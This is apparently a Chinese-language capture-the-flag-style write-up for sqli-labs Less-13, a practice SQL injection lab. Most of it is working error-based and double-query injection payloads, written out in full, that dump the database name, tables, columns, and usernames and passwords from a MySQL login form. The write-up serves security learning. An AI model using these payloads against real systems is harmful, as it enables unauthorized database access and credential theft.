#sqli-labs less13
由于less12 和less 11 差不多,只是单引号变成 ") 所以我们直接来解决less 13
对待less13 我们按老规矩判断其是数值型还是字符型 。。。。。。
然后我们发现他是’)
所以我们继续往下走
admin ’ order by n #
发现n=1 n=2 虽然没有想象中的回显,但是当n=3时,可以发现
所以可以判断字段数为2
接下来试试admin ') union select 1,2 #
发现没有回显位,试试 在 passwd 后面添加 11’) union select 1,2 #
发现还是没有
。。。
再能试试报错型注入
爆数据库名称
11’) and (select 1 from (select count(*),concat(floor(rand(0)*2),database())as x from information_schema.tables group by x)as a)–+
11’) and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(table_name)from information_schema.tables where table_schema=‘security’ limit 0,1))as x from information_schema.tables group by x )as a)#
11’) and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(column_name)from information_schema.columns where table_name=‘users’ limit 0,1))as x from information_schema.tables group by x )as a)#
11’) and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username)from security.users limit 0,1))as x from information_schema.tables group by x )as a)#
11’) and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(password)from security.users limit 0,1))as x from information_schema.tables group by x )as a)#
.
.
.
.
也可以用双查询注入
')union select count(*),concat(0x7e,(select database()),0x7e,floor(rand(0)*2))x from information_schema.tables group by x#